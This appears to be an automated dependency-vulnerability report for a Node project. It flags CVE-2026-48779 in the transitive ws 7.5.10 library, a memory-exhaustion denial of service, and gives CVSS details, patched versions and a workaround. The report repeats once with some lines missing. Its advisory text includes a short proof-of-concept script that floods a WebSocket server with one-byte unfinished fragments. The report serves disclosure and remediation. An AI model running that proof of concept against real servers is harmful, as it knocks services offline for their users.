Vulnerable Library - express-ws-5.0.2.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Found in HEAD commit: 9bb08a97b5275375dd3a7a2b5bd5bcd0887285a2
Vulnerabilities
| Vulnerability |
Severity |
 CVSS |
Dependency |
Type |
Fixed in (express-ws version) |
Remediation Possible** |
| CVE-2026-48779 |
 High |
7.5 |
ws-7.5.10.tgz |
Transitive |
N/A* |
❌ |
*For some transitive vulnerabilities, there is no version of direct dependency with a fix. Check the "Details" section below to see if there is a version of transitive dependency where vulnerability is fixed.
**In some cases, Remediation PR cannot be created automatically for a vulnerability despite the availability of remediation
Details
CVE-2026-48779
Vulnerable Library - ws-7.5.10.tgz
Library home page: https://registry.npmjs.org/ws/-/ws-7.5.10.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
- express-ws-5.0.2.tgz (Root Library)
- ❌ ws-7.5.10.tgz (Vulnerable Library)
Found in HEAD commit: 9bb08a97b5275375dd3a7a2b5bd5bcd0887285a2
Found in base branch: main
Vulnerability Details
Impact A high volume of exceptionally small fragments and data chunks can be sent by a peer, with modest network traffic, to force the remote peer into allocating and holding structural wrappers that consume far more memory than the default documented message-size limit, leading to process termination due to OOM. Proof of concept import { WebSocket, WebSocketServer } from 'ws'; const wss = new WebSocketServer({ port: 0 }, function () { const data = Buffer.alloc(1); const options = { fin: false }; const { port } = wss.address(); const ws = new WebSocket("ws://localhost:${port}"); ws.on('open', function () { (function send() { ws.send(data, options, function (err) { if (err) return; send(); }); })(); }); ws.on('error', console.error); ws.on('close', function (code, reason) { console.log("client close - code: ${code} reason: ${reason.toString()}"); }); }); wss.on('connection', function (ws) { ws.on('error', console.error); ws.on('close', function (code, reason) { console.log("server close - code: ${code} reason: ${reason.toString()}"); }); }); Patches The vulnerability was fixed in ws@8.21.0 (websockets/ws@bca91ad) and backported to ws@7.5.11 (websockets/ws@fd36cd8), ws@6.2.4 (websockets/ws@86d3e8a), and ws@5.2.5 (websockets/ws@b5372ac). Workarounds In vulnerable versions, the issue can be mitigated by lowering the value of the "maxPayload" option if possible. Credits The vulnerability was responsibly disclosed and fixed by "Nadav Magier" (https://github.com/Nadav0077).
Publish Date: 2026-06-15
URL: CVE-2026-48779
CVSS 3 Score Details (7.5)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: None
- Integrity Impact: None
- Availability Impact: High
For more information on CVSS3 Scores, click here.
Suggested Fix
Type: Upgrade version
Origin: GHSA-96hv-2xvq-fx4p
Release Date: 2026-06-15
Fix Resolution: ws - 5.2.5,ws - 6.2.4,ws - 7.5.11,ws - 8.21.0
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Found in HEAD commit: 9bb08a97b5275375dd3a7a2b5bd5bcd0887285a2
Vulnerabilities
*For some transitive vulnerabilities, there is no version of direct dependency with a fix. Check the "Details" section below to see if there is a version of transitive dependency where vulnerability is fixed.
**In some cases, Remediation PR cannot be created automatically for a vulnerability despite the availability of remediation
Details
Vulnerable Library - ws-7.5.10.tgz
Library home page: https://registry.npmjs.org/ws/-/ws-7.5.10.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
Found in HEAD commit: 9bb08a97b5275375dd3a7a2b5bd5bcd0887285a2
Found in base branch: main
Vulnerability Details
Impact A high volume of exceptionally small fragments and data chunks can be sent by a peer, with modest network traffic, to force the remote peer into allocating and holding structural wrappers that consume far more memory than the default documented message-size limit, leading to process termination due to OOM. Proof of concept import { WebSocket, WebSocketServer } from 'ws'; const wss = new WebSocketServer({ port: 0 }, function () { const data = Buffer.alloc(1); const options = { fin: false }; const { port } = wss.address(); const ws = new WebSocket("ws://localhost:${port}"); ws.on('open', function () { (function send() { ws.send(data, options, function (err) { if (err) return; send(); }); })(); }); ws.on('error', console.error); ws.on('close', function (code, reason) { console.log("client close - code: ${code} reason: ${reason.toString()}"); }); }); wss.on('connection', function (ws) { ws.on('error', console.error); ws.on('close', function (code, reason) { console.log("server close - code: ${code} reason: ${reason.toString()}"); }); }); Patches The vulnerability was fixed in ws@8.21.0 (websockets/ws@bca91ad) and backported to ws@7.5.11 (websockets/ws@fd36cd8), ws@6.2.4 (websockets/ws@86d3e8a), and ws@5.2.5 (websockets/ws@b5372ac). Workarounds In vulnerable versions, the issue can be mitigated by lowering the value of the "maxPayload" option if possible. Credits The vulnerability was responsibly disclosed and fixed by "Nadav Magier" (https://github.com/Nadav0077).
Publish Date: 2026-06-15
URL: CVE-2026-48779
CVSS 3 Score Details (7.5)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: None
- Integrity Impact: None
- Availability Impact: High
For more information on CVSS3 Scores, click here.Suggested Fix
Type: Upgrade version
Origin: GHSA-96hv-2xvq-fx4p
Release Date: 2026-06-15
Fix Resolution: ws - 5.2.5,ws - 6.2.4,ws - 7.5.11,ws - 8.21.0